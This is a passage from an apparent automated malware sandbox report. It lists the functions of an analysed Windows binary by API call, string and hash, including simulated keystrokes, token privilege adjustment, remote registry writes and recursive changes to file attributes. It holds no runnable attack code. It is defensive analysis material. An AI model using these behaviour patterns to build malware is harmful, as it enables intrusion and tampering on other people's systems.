                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: LongNamePath_memmove
                                                                  • String ID:
                                                                  • API String ID: 2514874351-0
                                                                  • Opcode ID: 7c4d2a37497ac7f8906751d82c20e111adeaeb44e18073b49cf4ceb43c0e153b
                                                                  • Instruction ID: 4f17a1da771a70b167ddb1a2417f9807448f0813d10fdfc0eb1ea46aae969965
                                                                  • Opcode Fuzzy Hash: 7c4d2a37497ac7f8906751d82c20e111adeaeb44e18073b49cf4ceb43c0e153b
                                                                  • Instruction Fuzzy Hash: 5CE0863790412857C7209668AC05FEA779DDB897A0F0441B5FD0CD7219D9609C908691
                                                                  Function 0091525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: __wfsopen
                                                                  • String ID:
                                                                  • API String ID: 197181222-0
                                                                  • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                  • Instruction ID: e07bd38997252cce0e52722071695cd99962f90017e2ac86ff5bdbabf7994bf1
                                                                  • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                  • Instruction Fuzzy Hash: 85B0927A54020CB7CE012A82EC02B893B199B91764F418020FB1C18172A677A6A49A89
                                                                  Function 01415100 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNELBASE(000001F4), ref: 01415111
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1285208597.0000000001412000.00000040.00000020.00020000.00000000.sdmp, Offset: 01412000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1412000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                  • Instruction ID: b41343dc8d8c7aa274c9f5833440465955d5ec25d62a6e0828f5a9ef302349a3
                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                  • Instruction Fuzzy Hash: 53E0E67494010DEFDB00EFF4D6496EE7FB4EF04301F100161FD01D2281D6309D508A62

                                                                  Non-executed Functions

                                                                  Function 0097CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F2612: GetWindowLongW.USER32(?,000000EB), ref: 008F2623
                                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0097CB37
                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0097CB95
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0097CBD6
                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0097CC00
                                                                  • SendMessageW.USER32 ref: 0097CC29
                                                                  • _wcsncpy.LIBCMT ref: 0097CC95
                                                                  • GetKeyState.USER32(00000011), ref: 0097CCB6
                                                                  • GetKeyState.USER32(00000009), ref: 0097CCC3
                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0097CCD9
                                                                  • GetKeyState.USER32(00000010), ref: 0097CCE3
                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0097CD0C
                                                                  • SendMessageW.USER32 ref: 0097CD33
                                                                  • SendMessageW.USER32(?,00001030,?,0097B348), ref: 0097CE37
                                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0097CE4D
                                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0097CE60
                                                                  • SetCapture.USER32(?), ref: 0097CE69
                                                                  • ClientToScreen.USER32(?,?), ref: 0097CECE
                                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0097CEDB
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0097CEF5
                                                                  • ReleaseCapture.USER32 ref: 0097CF00
                                                                  • GetCursorPos.USER32(?), ref: 0097CF3A
                                                                  • ScreenToClient.USER32(?,?), ref: 0097CF47
                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0097CFA3
                                                                  • SendMessageW.USER32 ref: 0097CFD1
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0097D00E
                                                                  • SendMessageW.USER32 ref: 0097D03D
                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0097D05E
                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0097D06D
                                                                  • GetCursorPos.USER32(?), ref: 0097D08D
                                                                  • ScreenToClient.USER32(?,?), ref: 0097D09A
                                                                  • GetParent.USER32(?), ref: 0097D0BA
                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0097D123
                                                                  • SendMessageW.USER32 ref: 0097D154
                                                                  • ClientToScreen.USER32(?,?), ref: 0097D1B2
                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0097D1E2
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0097D20C
                                                                  • SendMessageW.USER32 ref: 0097D22F
                                                                  • ClientToScreen.USER32(?,?), ref: 0097D281
                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0097D2B5
                                                                    • Part of subcall function 008F25DB: GetWindowLongW.USER32(?,000000EB), ref: 008F25EC
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0097D351
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                  • String ID: @GUI_DRAGID$F
                                                                  • API String ID: 3977979337-4164748364
                                                                  • Opcode ID: 0fe559ef2bb9470586957f4e0b20e1ceefc56e8a818bb546b930f29724b834ce
                                                                  • Instruction ID: d08d25bf0fdfde34318f09ff05bef27d326b0c758f741a0e020fdfeea3658059
                                                                  • Opcode Fuzzy Hash: 0fe559ef2bb9470586957f4e0b20e1ceefc56e8a818bb546b930f29724b834ce
                                                                  • Instruction Fuzzy Hash: 9F42BFB6208241AFD721CF64D885BAABBE9FF49710F144A1DF699D72B0C731D840EB52
                                                                  Function 00906F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$_memset
                                                                  • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                  • API String ID: 1357608183-1798697756
                                                                  • Opcode ID: 75d07af823a685f94e0ce4e14fda7ade19d38667ad2e8d0bdf7fb10132b635a3
                                                                  • Instruction ID: c011f42099b69b5e758004632a59df41e5184039a35a76dc120906a7e6ed0847
                                                                  • Opcode Fuzzy Hash: 75d07af823a685f94e0ce4e14fda7ade19d38667ad2e8d0bdf7fb10132b635a3
                                                                  • Instruction Fuzzy Hash: 5893A271E04219DFDB24CFA8C881BADB7B5FF48310F25856AE955AB281E774AD81CB40
                                                                  Function 008F48D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetForegroundWindow.USER32(00000000,?), ref: 008F48DF
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0092D665
                                                                  • IsIconic.USER32(?), ref: 0092D66E
                                                                  • ShowWindow.USER32(?,00000009), ref: 0092D67B
                                                                  • SetForegroundWindow.USER32(?), ref: 0092D685
                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0092D69B
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0092D6A2
                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0092D6AE
                                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 0092D6BF
                                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 0092D6C7
                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 0092D6CF
                                                                  • SetForegroundWindow.USER32(?), ref: 0092D6D2
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0092D6E7
                                                                  • keybd_event.USER32(00000012,00000000), ref: 0092D6F2
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0092D6FC
                                                                  • keybd_event.USER32(00000012,00000000), ref: 0092D701
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0092D70A
                                                                  • keybd_event.USER32(00000012,00000000), ref: 0092D70F
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0092D719
                                                                  • keybd_event.USER32(00000012,00000000), ref: 0092D71E
                                                                  • SetForegroundWindow.USER32(?), ref: 0092D721
                                                                  • AttachThreadInput.USER32(?,?,00000000), ref: 0092D748
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 4125248594-2988720461
                                                                  • Opcode ID: 0b3fd9034704f59549e0b8e63d0270e665ee785b692cd9ba60a2a8fd9449e5f9
                                                                  • Instruction ID: d4267b291cb3c6be16eec2719e2dc44b0335bffb9200d71650ff181b695dbfad
                                                                  • Opcode Fuzzy Hash: 0b3fd9034704f59549e0b8e63d0270e665ee785b692cd9ba60a2a8fd9449e5f9
                                                                  • Instruction Fuzzy Hash: 3F315272A55318BAEB206B619C89F7F7F6CEB44B50F104025FA08FA1D1C6B45941BAA1
                                                                  Function 00948310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 009487E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0094882B
                                                                    • Part of subcall function 009487E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00948858
                                                                    • Part of subcall function 009487E1: GetLastError.KERNEL32 ref: 00948865
                                                                  • _memset.LIBCMT ref: 00948353
                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009483A5
                                                                  • CloseHandle.KERNEL32(?), ref: 009483B6
                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009483CD
                                                                  • GetProcessWindowStation.USER32 ref: 009483E6
                                                                  • SetProcessWindowStation.USER32(00000000), ref: 009483F0
                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0094840A
                                                                    • Part of subcall function 009481CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00948309), ref: 009481E0
                                                                    • Part of subcall function 009481CB: CloseHandle.KERNEL32(?,?,00948309), ref: 009481F2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                  • String ID: $default$winsta0
                                                                  • API String ID: 2063423040-1027155976
                                                                  • Opcode ID: 6d8f13299ccb7feb6d4db3120efe911111542bbe782964eb064ffb931256809c
                                                                  • Instruction ID: 1998e201dceaffb05232e3112de5a5daac7669311f5f398e88482d78b36340e0
                                                                  • Opcode Fuzzy Hash: 6d8f13299ccb7feb6d4db3120efe911111542bbe782964eb064ffb931256809c
                                                                  • Instruction Fuzzy Hash: 42814872904209AFDF11AFA4DC45EEFBBB8EF08704F1441A9F914B6261DB318E54DB20
                                                                  Function 0095C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0095C78D
                                                                  • FindClose.KERNEL32(00000000), ref: 0095C7E1
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0095C806
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0095C81D
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0095C844
                                                                  • __swprintf.LIBCMT ref: 0095C890
                                                                  • __swprintf.LIBCMT ref: 0095C8D3
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                  • __swprintf.LIBCMT ref: 0095C927
                                                                    • Part of subcall function 00913698: __woutput_l.LIBCMT ref: 009136F1
                                                                  • __swprintf.LIBCMT ref: 0095C975
                                                                    • Part of subcall function 00913698: __flsbuf.LIBCMT ref: 00913713
                                                                    • Part of subcall function 00913698: __flsbuf.LIBCMT ref: 0091372B
                                                                  • __swprintf.LIBCMT ref: 0095C9C4
                                                                  • __swprintf.LIBCMT ref: 0095CA13
                                                                  • __swprintf.LIBCMT ref: 0095CA62
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                  • API String ID: 3953360268-2428617273
                                                                  • Opcode ID: 50ffa7560aeee22cf0e0c3dddaeb09cfa6296646fbfe5681aea94f85c21db1f0
                                                                  • Instruction ID: 617f0c507c2eca655155771cc897b548f3990686bc869cf8fb235412bc6dc634
                                                                  • Opcode Fuzzy Hash: 50ffa7560aeee22cf0e0c3dddaeb09cfa6296646fbfe5681aea94f85c21db1f0
                                                                  • Instruction Fuzzy Hash: D1A11EB1508308ABD744EBA4D886EBFB7ECFF94704F404929F695C6151EA34DA48CB63
                                                                  Function 0095EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0095EFB6
                                                                  • _wcscmp.LIBCMT ref: 0095EFCB
                                                                  • _wcscmp.LIBCMT ref: 0095EFE2
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0095EFF4
                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 0095F00E
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0095F026
                                                                  • FindClose.KERNEL32(00000000), ref: 0095F031
                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0095F04D
                                                                  • _wcscmp.LIBCMT ref: 0095F074
                                                                  • _wcscmp.LIBCMT ref: 0095F08B
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0095F09D
                                                                  • SetCurrentDirectoryW.KERNEL32(009A8920), ref: 0095F0BB
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0095F0C5
                                                                  • FindClose.KERNEL32(00000000), ref: 0095F0D2
                                                                  • FindClose.KERNEL32(00000000), ref: 0095F0E4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                  • String ID: *.*
                                                                  • API String ID: 1803514871-438819550
                                                                  • Opcode ID: 00a6db8b9c98bf2575ee3e72623bb880fc8a1b975cc934b5033d54b7682a73c6
                                                                  • Instruction ID: d62e23402fb1f5457b4bcbc495c6f128b068187d3b07dd6c2822a98a54158bc7
                                                                  • Opcode Fuzzy Hash: 00a6db8b9c98bf2575ee3e72623bb880fc8a1b975cc934b5033d54b7682a73c6
                                                                  • Instruction Fuzzy Hash: BA31D2325042186ACF14DBB5DC68AEE77ACAF89361F144175EC18E20D1EB70DA88DB61
                                                                  Function 00970857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00970953
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,0097F910,00000000,?,00000000,?,?), ref: 009709C1
                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00970A09
                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00970A92
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00970DB2
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00970DBF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                  • API String ID: 536824911-966354055
                                                                  • Opcode ID: afb49e5f834ab58c65b006db04c02d2641332b13e21a89c392b0f18721bfdbda
                                                                  • Instruction ID: 0155d65503c648a9be0e3ced6d917ffec8aa4367897f473cc51cac1239b76097
                                                                  • Opcode Fuzzy Hash: afb49e5f834ab58c65b006db04c02d2641332b13e21a89c392b0f18721bfdbda
                                                                  • Instruction Fuzzy Hash: 07024C766146059FCB14EF28C855E2AB7E5FF89314F04846CF9999B3A2DB30ED41CB82
                                                                  Function 0095F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0095F113
                                                                  • _wcscmp.LIBCMT ref: 0095F128
                                                                  • _wcscmp.LIBCMT ref: 0095F13F
                                                                    • Part of subcall function 00954385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009543A0
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0095F16E
                                                                  • FindClose.KERNEL32(00000000), ref: 0095F179
                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0095F195
                                                                  • _wcscmp.LIBCMT ref: 0095F1BC
                                                                  • _wcscmp.LIBCMT ref: 0095F1D3
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0095F1E5
                                                                  • SetCurrentDirectoryW.KERNEL32(009A8920), ref: 0095F203
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0095F20D
                                                                  • FindClose.KERNEL32(00000000), ref: 0095F21A
                                                                  • FindClose.KERNEL32(00000000), ref: 0095F22C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                  • String ID: *.*
                                                                  • API String ID: 1824444939-438819550
                                                                  • Opcode ID: b1adce6437091c5b60081c83d07507e34f31a1c2b6affdd782b4c7a8acf93382
                                                                  • Instruction ID: 9c4368ab75a452c0cdff0746934d7582bb862b36fd46bc1214119d769d4b0979
                                                                  • Opcode Fuzzy Hash: b1adce6437091c5b60081c83d07507e34f31a1c2b6affdd782b4c7a8acf93382
                                                                  • Instruction Fuzzy Hash: F531F536504619AACF10DB61EC68EEE77AC9F85375F104175FC18E20A0EB30DE89CB94
                                                                  Function 0095A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0095A20F
                                                                  • __swprintf.LIBCMT ref: 0095A231
                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0095A26E
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0095A293
                                                                  • _memset.LIBCMT ref: 0095A2B2
                                                                  • _wcsncpy.LIBCMT ref: 0095A2EE
                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0095A323
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0095A32E
                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 0095A337
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0095A341
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                  • String ID: :$\$\??\%s
                                                                  • API String ID: 2733774712-3457252023
                                                                  • Opcode ID: 526189a17238e680a8065b5d2d796e3e9b8bb452e43fdf41b473df7d0976feb2
                                                                  • Instruction ID: 0214e6b37c85b07f4c5784908dc46c7ebfba24b61d3d9eeda0acc106fb1a65cf
                                                                  • Opcode Fuzzy Hash: 526189a17238e680a8065b5d2d796e3e9b8bb452e43fdf41b473df7d0976feb2
                                                                  • Instruction Fuzzy Hash: BB31E77690410AABDB20DFA1DC49FEF37BCEF89745F1041B6F908E6160EB7096848B25
                                                                  Function 00947CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
